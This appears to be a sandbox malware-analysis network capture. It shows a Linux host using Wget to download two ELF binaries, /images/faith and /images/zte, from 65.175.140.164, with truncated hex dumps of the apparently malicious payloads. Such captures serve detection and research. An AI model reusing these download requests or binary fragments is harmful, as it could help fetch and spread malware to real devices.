Nov 25, 2024 11:35:31.810097933 CET	58728	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:31.817111969 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.817162037 CET	58728	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:31.817219973 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.817257881 CET	58728	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:31.824402094 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.824476004 CET	58728	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:31.824508905 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.824542046 CET	58728	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:31.831645012 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.831690073 CET	58728	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:31.831732035 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.831772089 CET	58728	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:31.948350906 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.948451996 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.948601961 CET	58728	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:31.948626041 CET	58728	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:31.950800896 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.950835943 CET	58728	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:31.950948954 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.950984955 CET	58728	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:31.955738068 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.955777884 CET	58728	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:31.955952883 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.960701942 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.960746050 CET	58728	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:31.960750103 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.965614080 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.965656042 CET	58728	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:31.965718985 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.970412016 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.970448017 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.972896099 CET	58728	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:31.975090027 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.975155115 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.979790926 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.979849100 CET	58728	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:31.979932070 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.984498978 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.984622955 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.985698938 CET	58728	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:31.989223003 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.989346027 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.992589951 CET	58728	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:31.993938923 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.993979931 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.994033098 CET	58728	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:32.037883043 CET	58728	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:32.157417059 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:32.521727085 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:32.641588926 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:32.641829967 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:32.643780947 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:32.763226986 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:33.818455935 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:33.818470001 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:33.818480015 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:33.818667889 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:33.818667889 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:33.818667889 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:33.826934099 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:33.826955080 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:33.827017069 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:33.827017069 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:33.828022003 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:33.828069925 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:33.828098059 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:33.828108072 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:33.828116894 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:33.828138113 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:33.828138113 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:33.828155994 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:33.829205990 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:33.829267979 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:33.938337088 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:33.938397884 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:33.938412905 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:33.938585043 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:33.942470074 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:33.942506075 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:33.942517042 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:33.942560911 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:33.950831890 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:33.950876951 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:34.019596100 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:34.019609928 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:34.019702911 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:34.023818970 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:34.023854971 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:34.023974895 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:34.032196999 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:34.032265902 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:34.035480976 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:34.035648108 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:34.035942078 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:34.043837070 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:34.043921947 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:34.044298887 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:34.052201033 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:34.052346945 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:34.052695990 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:34.060611963 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:34.060698032 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:34.061109066 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:34.068964005 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:34.069091082 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:34.069396973 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:34.077429056 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:34.077507019 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:34.077562094 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:34.077603102 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:34.085063934 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:34.085125923 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:34.085166931 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:34.085227966 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:34.092380047 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:34.092431068 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:34.092551947 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:34.092586040 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:34.099654913 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:34.099714994 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:34.099824905 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:34.099859953 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:34.106765032 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:34.106812000 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:34.106831074 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:34.107187986 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:34.220923901 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:34.220938921 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:34.221009970 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:34.221044064 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:34.223259926 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:34.223318100 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:34.223413944 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:34.223445892 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:34.227804899 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:34.227870941 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:34.227880955 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:34.227920055 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:34.232358932 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:34.232403994 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:34.232425928 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:34.232462883 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:34.236840963 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:34.236900091 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:34.236920118 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:34.236955881 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:34.240139008 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:34.240181923 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:34.240252972 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:34.240304947 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:34.244546890 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:34.244559050 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:34.244585991 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:34.244602919 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:34.248929977 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:34.248975039 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:34.248987913 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:34.249026060 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:34.253272057 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:34.253310919 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:34.253380060 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:34.257641077 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:34.257685900 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:34.257752895 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:34.262002945 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:34.262058020 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:34.297499895 CET	58730	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:34.417037010 CET	80	58730	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:37.093811989 CET	42836	443	192.168.2.23	91.189.91.43
Nov 25, 2024 11:35:38.629609108 CET	42516	80	192.168.2.23	109.202.202.202
Nov 25, 2024 11:35:51.939740896 CET	43928	443	192.168.2.23	91.189.91.42
Nov 25, 2024 11:36:04.226109982 CET	42836	443	192.168.2.23	91.189.91.43
Nov 25, 2024 11:36:08.321562052 CET	42516	80	192.168.2.23	109.202.202.202
Nov 25, 2024 11:36:32.894108057 CET	43928	443	192.168.2.23	91.189.91.42

HTTP Request Dependency Graph

65.175.140.164

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.23	58728	65.175.140.164	80

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 11:35:30.365338087 CET	165	OUT	GET /images/faith HTTP/1.1 User-Agent: Wget/1.20.3 (linux-gnu) Accept: / Accept-Encoding: identity Host: 65.175.140.164 Connection: Keep-Alive
Nov 25, 2024 11:35:31.545496941 CET	1236	IN	HTTP/1.1 200 OK Server: thttpd/2.29 23May2018 Access-Control-Allow-Origin: * Content-Type: text/plain; charset=UTF-8 Date: Sun, 04 Jan 1970 23:02:43 GMT Last-Modified: Thu, 01 Jan 1970 00:06:46 GMT Accept-Ranges: bytes Connection: close Content-Length: 69440 Data Raw: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 02 00 08 00 01 00 00 00 50 f0 49 00 34 00 00 00 00 00 00 00 07 10 00 00 34 00 20 00 02 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 40 00 00 00 40 00 00 10 00 00 f8 2a 08 00 06 00 00 00 00 00 01 00 01 00 00 00 00 00 00 00 00 00 49 00 00 00 49 00 e9 03 01 00 e9 03 01 00 05 00 00 00 00 00 01 00 ed ee d6 7b 31 77 6f 6d a4 13 0e 1e 00 00 00 00 10 52 04 00 10 52 04 00 b4 00 00 00 5f 00 00 00 0e 00 00 00 1a 03 00 3f 91 45 84 68 3b de de a6 0f 23 da 99 a6 01 33 a4 46 52 11 fe 66 17 e6 db f9 6b de 4e d7 54 97 4d da cc 69 98 25 30 0e 5a 62 35 ae ee 82 13 05 20 3e 32 ec a1 f1 2f af e3 59 f6 a9 ee 55 34 15 4b 3f c7 03 4a 1c 06 ca c1 3c 24 1f de 43 7c 8f 2d 1a a5 3d 1c 7a e7 bb 5e 47 05 18 10 88 03 00 23 e6 00 00 0e 00 00 00 1a 03 00 00 68 2a df 69 58 d4 f4 52 d3 84 cb e4 44 de 71 ae d2 c6 b2 05 99 88 48 78 16 21 b6 a7 f1 9f fb 63 95 02 ab bf b8 e8 db 4d 45 3d 48 ce 5d 10 f9 ee 0a 1b bd a0 f9 9b 5f bd 74 5f 07 8a ea 72 2d d9 ed c3 84 0b 0a 39 ce 18 81 2b 04 [TRUNCATED] Data Ascii: ELFPI44 @@II{1womRR_?Eh;#3FRfkNTMi%0Zb5 >2/YU4K?J<$C\|-=z^G#hiXRDqHx!cME=H]_t_r-9+G5,niLA-<zHkSy];Tuen+oQ]k(SF[<!Res,1_"-)rUP<1$,2tg=Zes)+gj@/-u9^`GWi2L,K,k,uk-U{&wC~^E5"b^Qj#[LViY6+3`H_BrvD[$h_\|hx^?h[z"3_Z3JDQ5oZ3IW.\Te,>*sPDgvxr/n,d/Ew=sTTSXZ\m,?~r/D~f]N^vT$8)@.p+fIsPn@).]i${2ya[Zx\M139PB(SPH=
Nov 25, 2024 11:35:31.545507908 CET	248	IN	Data Raw: f6 06 dc 4d 99 64 32 85 72 4f 1d 0b 49 6b ec d4 c8 51 5e c8 82 70 3a c8 92 a3 15 0f 77 30 b3 50 ec f8 3d c1 ab 6d 7d 99 04 8b 37 ad d9 be e4 7e 32 df e4 c3 49 26 63 46 ed c4 48 92 5e 0b 84 68 b8 44 14 41 f9 6f 37 c7 aa 6d 54 46 21 09 82 fb 64 9b Data Ascii: Md2rOIkQ^p:w0P=m}7~2I&cFH^hDAo7mTF!d3&E!y=vf)['_" D<NM}wN:.wZL,*Qd{-#X`{wyPZ)gN"+Ob6~<e=NtjI'MXz}J"KfU
Nov 25, 2024 11:35:31.545650959 CET	1236	IN	Data Raw: fb 48 90 18 b3 0a 19 00 0c bb 0f 80 62 66 b5 3b fb 4b 56 fa c6 f4 d1 ce 73 82 35 d5 3f a6 bf 6f 0d 12 32 59 d9 c3 49 1a cc c4 b9 85 18 63 01 d1 ab b7 4f a9 a1 6d c2 79 3b 93 71 25 a5 bd 3c e5 fc 28 53 40 27 85 e4 59 39 60 c1 de 69 9f 95 31 e2 b8 Data Ascii: Hbf;KVs5?o2YIcOmy;q%<(S@'Y9`i11V{OgTcH=(8,Wug&J5\|1#1[/'tp_l-47{9ehXOt-k"R}.w5[]O,yAOAC^
Nov 25, 2024 11:35:31.545739889 CET	1236	IN	Data Raw: cf 72 e9 84 12 81 c7 7c 75 c9 fa ed aa 78 24 ff af b3 e5 88 c5 f7 24 53 c1 ae 95 bb 02 93 b9 51 50 04 20 ad 7d dc 23 83 14 07 63 d0 bb c5 a3 0a b0 4b f2 86 05 b4 39 79 d9 1b f2 cd 04 7e 58 4b c1 29 20 02 c8 3c ba d2 43 fd 1f d2 81 72 2b 3d aa f4 Data Ascii: r\|ux$$SQP }#cK9y~XK) <Cr+=)0JWD%XhSCRe6\|WY9K^cdtPE<RQ6!lao~ VRotn~t!\|mw)l5UE68Ncq.\|E6,-12@
Nov 25, 2024 11:35:31.545748949 CET	484	IN	Data Raw: 5b d7 06 da 36 db 19 38 35 f6 ab 24 3f bd c0 96 be 00 21 bb 2c 93 62 2f 48 3b 9a 38 5e 08 ad ae d3 5b 9b fb ac 67 8a 20 a5 52 e1 b3 ae e3 71 e8 c2 c9 1a 4c 04 74 7d 51 bc b9 ef 80 c7 b9 07 5e 75 47 41 1c e6 f9 fc 2a de 4f 4a a0 86 84 eb 16 1f 57 Data Ascii: [685$?!,b/H;8^[g RqLt}Q^uGAOJW1j[,m\MJQ^PLSNrgdrt\.H)%5(z>E2,3-y<nckdng~44Yl{Q3Z;V0L0W7\|
Nov 25, 2024 11:35:31.545763969 CET	1236	IN	Data Raw: d1 11 88 d0 95 3c 1d 6a 2b 99 ae 20 4f 9e 97 2c 46 43 69 8e 7d 4f 95 0c b7 2d 9a d2 96 23 10 5a bf 3e eb 0e 31 36 84 19 a1 85 cb 7f 94 8e 62 30 d1 7a 29 a2 c6 ee f6 28 63 dc cf ad 78 08 e6 d4 d9 8e aa cf be c4 04 6e b9 82 b2 3b 98 ab a5 37 02 d6 Data Ascii: <j+ O,FCi}O-#Z>16b0z)(cxn;7@d:L4svOl)p'0l/}'nOp_$\wc%O$(p_{V<#*&G?6o6Xw+3K#y
Nov 25, 2024 11:35:31.545830011 CET	1236	IN	Data Raw: 9d d9 14 59 79 b1 c2 26 9d f6 ad 7b 41 c9 89 bb 40 62 35 64 8d 8f d1 3f f0 05 5e 10 de 85 28 b3 69 61 4d c3 16 20 2f 10 fc 8b ae 78 14 9c b0 40 4e 56 df 24 c8 0f 41 a4 fb 93 48 56 55 b6 d7 e6 ff 0f 10 b7 83 4e 07 4a af 47 9b 9d b9 99 8c 12 e1 26 Data Ascii: Yy&{A@b5d?^(iaM /x@NV$AHVUNJG&4}RW6g%s?+(z==fY~Rm<7>!f}"@JB98YT\jM1(pxkp2#]G3@pdj5;Z5~*Y(/Fh
Nov 25, 2024 11:35:31.545839071 CET	484	IN	Data Raw: f7 d4 8a 49 88 3e 01 e0 3a 74 6e 99 b3 a3 75 24 a4 54 05 46 b6 c1 36 98 b7 30 ce 62 cf 8f 79 63 99 bd bf 98 a1 7f 15 67 36 3a ed 29 82 b3 83 4e 05 e3 3d 3c eb 44 0a 75 df d3 0a 19 57 65 e8 91 66 be d2 86 67 04 0e d8 2b 21 ef c6 d1 d1 b8 01 06 9a Data Ascii: I>:tnu$TF60bycg6:)N=<DuWefg+!?q\|kHR#O/GLmwsD(QrUPy$D0'c7I5:Q`+pLZf:j-03;FNcwq`0"exr
Nov 25, 2024 11:35:31.545855045 CET	1236	IN	Data Raw: ae cf 85 08 9b 86 dc 69 ac a0 81 84 24 c3 8e 86 1a 92 3c 24 cf 49 fa ff ca 2b 05 4a 82 c0 6d d6 f2 8d 6b f7 bb 0c f7 34 7d b9 18 ce cc cb 1a 09 a4 5e a0 5c 0a 15 ac f0 b2 db 39 6d 05 27 22 04 8e a8 40 ce c0 53 44 f9 7d cc c4 8c 69 fa 0d 40 50 b9 Data Ascii: i$<$I+Jmk4}^\9m'"@SD}i@PJY>fe6p]Qc?\|~6{erM1AwK7g51'{x'\|,Dn,M@JGurD-[V0"R#yzRJ6^1CNl$^E
Nov 25, 2024 11:35:31.545954943 CET	1236	IN	Data Raw: 9a 6b 0f 53 20 f2 3d 00 99 b1 72 84 f8 49 e6 dd 39 a4 a3 57 bd 94 e9 15 14 d1 b0 2d a0 72 9c b1 24 0e 40 7b 06 5a a8 c6 86 3d 50 09 c7 fb 1d 0d e2 f6 e0 c9 5d bd 52 f8 bd b3 33 d6 cc d3 c4 4a 23 e6 39 00 71 10 24 6a f0 3f 8e 77 c4 ec 7c 9d 08 b6 Data Ascii: kS =rI9W-r$@{Z=P]R3J#9q$j?w\|*CRVYV8g&U]b\BM#mZ>I?OE!\|:z!!(eb<<jcLic`9SV!{88ywtZG-se12"a
Nov 25, 2024 11:35:31.665595055 CET	1236	IN	Data Raw: 00 58 dc 51 dc 3e 55 9e a2 e6 29 9f f4 d9 19 2f 58 69 78 fe 61 fd 2d 9b 14 06 93 f1 bf 04 20 6b e3 45 78 ea 6f 36 7f 9e b8 68 55 52 63 3f 46 7a 1c 86 9b e1 86 a0 93 de 36 e9 b5 ef c7 04 81 d3 5d d3 ab 81 29 4c dd 65 33 fe 7b 13 19 d8 63 dc c6 8c Data Ascii: XQ>U)/Xixa- kExo6hURc?Fz6])Le3{cEB.bUH;C)UcZ'E.n^=fjIuZ[iv'H%q] DtLKAsPM]\%fu"yXbEKw~oUKd:md/Q,h

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.2.23	58730	65.175.140.164	80

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 11:35:32.643780947 CET	163	OUT	GET /images/zte HTTP/1.1 User-Agent: Wget/1.20.3 (linux-gnu) Accept: / Accept-Encoding: identity Host: 65.175.140.164 Connection: Keep-Alive
Nov 25, 2024 11:35:33.818455935 CET	1236	IN	HTTP/1.1 200 OK Server: thttpd/2.29 23May2018 Access-Control-Allow-Origin: * Content-Type: text/plain; charset=UTF-8 Date: Sun, 04 Jan 1970 23:02:45 GMT Last-Modified: Thu, 01 Jan 1970 00:08:59 GMT Accept-Ranges: bytes Connection: close Content-Length: 68124 Data Raw: 7f 45 4c 46 01 02 01 00 00 00 00 00 00 00 00 00 00 02 00 08 00 00 00 01 00 49 eb b0 00 00 00 34 00 00 00 00 00 00 10 07 00 34 00 20 00 02 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 40 00 00 00 40 00 00 00 00 10 00 00 08 28 b8 00 00 00 06 00 01 00 00 00 00 00 01 00 00 00 00 00 49 00 00 00 49 00 00 00 00 ff 44 00 00 ff 44 00 00 00 05 00 01 00 00 42 1a f2 e7 31 77 6f 6d 13 a0 0e 89 00 00 00 00 00 04 4f b0 00 04 4f b0 00 00 00 b4 00 00 00 61 0e 00 00 00 1a 03 00 3f 91 45 84 68 34 8a 09 0a 40 62 ae 9e 29 20 b2 fa 5d c8 ec 30 f1 82 9d 70 24 05 72 43 cd 2f bc c7 e6 e6 fa 9a 53 05 6f 1e 5d 98 74 22 9c fc 00 cb e4 cd 7b 92 d5 fb 52 c6 99 25 59 96 36 c7 df 4a e8 4c bc 62 66 a9 3b eb 14 cd 8f ba 28 bc bd 46 ca a7 89 0a cb a5 cd 8c 0c 80 f5 e7 00 00 03 85 c0 00 00 e1 b3 0e 00 00 00 1a 03 00 59 00 33 01 24 15 48 02 18 bb ff 13 57 06 8e 82 8b 3f 2b 1b bd 02 e9 80 c6 af 41 5c f6 ac 52 54 33 2e 62 aa aa 65 a6 8a d3 21 a8 c0 3d 7a d3 30 5b 8a d6 9c 29 87 e5 59 52 35 dd ea 0d 5d c0 69 39 0d a0 eb 05 fc ed ae 08 45 [TRUNCATED] Data Ascii: ELFI44 @@(IIDDB1womOOa?Eh4@b) ]0p$rC/So]t"{R%Y6JLbf;(FY3$HW?+A\RT3.be!=z0[)YR5]i9EP6gsbp'zzE'X&BVo^go8J& VV>4p0U"z7fq^%wb~![q6%_U Ix4kI#knFYK5;TVI>7$eS'cDCd=7oh;5'Bg+(^}9(7u[rAJ5":.Oj;%s*g<D"@vqb.Vu"}KuK8(He;S1X[PeS95DQyi6VQX=#yt%3;sj)Pb#gg4N`}Y^,nvKal}k_Jh`Y~\|Rw<1p{#7.cbkH0~~fRJKWuz>Xmc(_!?i"\|xO@Ok0%~]{b&:
Nov 25, 2024 11:35:33.818470001 CET	1236	IN	Data Raw: 33 58 54 8f fe 73 69 b0 7c 91 d3 a1 66 42 8a 30 8d 95 85 8a 23 17 29 1f ed b7 7a 5f 45 d0 e6 14 04 16 50 69 3f 94 84 86 a8 bf 81 12 13 1d 7a 59 48 75 e1 f9 cb 25 e9 05 9a bb 3d 1c 0f c6 af da 15 3b 97 2e 49 3e 8c f6 d3 89 5f 5a 43 e0 32 66 7e ed Data Ascii: 3XTsi\|fB0#)z_EPi?zYHu%=;.I>_ZC2f~MQcEYZ[r]fNZPUL9GOW3ja74WAlaxmuoO.8`4y]\|;^R\LjW}U;\SP96K
Nov 25, 2024 11:35:33.818480015 CET	484	IN	Data Raw: b8 be 85 af 0d 79 39 c7 20 b2 1e 3d ee a5 72 fb d0 80 f0 6d ee 76 96 fc 18 34 6b 63 0c 7d b6 76 27 8d df f5 56 8b 2e ee eb 40 8b 22 6d 22 d6 1b 4a 47 10 7c 73 1e a1 69 b9 76 d1 63 48 37 7a 46 a2 61 4a 31 5c d1 d0 0c 98 29 f5 61 b1 1c 66 22 a8 55 Data Ascii: y9 =rmv4kc}v'V.@"m"JG\|sivcH7zFaJ1\)af"U:VK4.K?."~3yYoi"A'=v}&\w/~B7U3Pp4C@\|o)Kg*:0D\|B\W.7i
Nov 25, 2024 11:35:33.826934099 CET	1236	IN	Data Raw: 62 fa e6 da 38 62 23 8c 36 0b 0e 27 34 fc c3 17 5e 10 55 bd 97 78 9e 7d b7 20 43 8d 13 12 6d 25 6c 11 94 ae 61 97 8a 17 59 d4 6e 43 c0 7c bb 99 45 0e 78 3d a4 cd ba 7c 03 69 2e 02 2b e6 75 f6 55 9f 22 25 61 5e 4c e8 7b 2d 44 97 d0 ef 31 70 b9 e1 Data Ascii: b8b#6'4^Ux} Cm%laYnC\|Ex=\|i.+uU"%a^L{-D1pg0b+7Xe0W- \\|\|v1Er_qzy"W)YA\!s9G9+={AfJKVGA#\MD\|aMqGO@dg#/Zv8D
